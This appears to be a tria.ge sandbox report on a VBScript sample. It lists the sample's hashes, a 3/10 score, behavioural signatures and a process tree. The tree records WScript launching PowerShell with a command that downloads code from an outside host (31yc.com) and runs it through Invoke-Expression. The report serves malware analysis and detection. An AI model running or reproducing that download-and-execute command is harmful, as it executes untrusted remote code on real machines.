Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03/04/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13.vbs
Resource
win7-20240221-en
4 signatures
150 seconds
General
-
Target
885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13.vbs
-
Size
7KB
-
MD5
4ff404ceede30c0ca73b97e26f20dfa8
-
SHA1
5b2644004b27a4b39502ad0d4a0193d0124588cb
-
SHA256
885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13
-
SHA512
4f8fbfb0dea83b81fcaff17cd4fea7cf888a99b186908f58b4b2d599b4a4f3df9bd9a8fadec7b25de5dea4dfaf416dca09ce6ce76a542ad32f0a96febe836ae1
-
SSDEEP
192:YMg119gkCtL3IqSPN3QzGNzUoNJnN/Y999E6:jy19gR3IquNgzG2oNla
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2200 wrote to memory of 2128 2200 WScript.exe 28 PID 2200 wrote to memory of 2128 2200 WScript.exe 28 PID 2200 wrote to memory of 2128 2200 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '31yc.com/gcwkaqrq')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-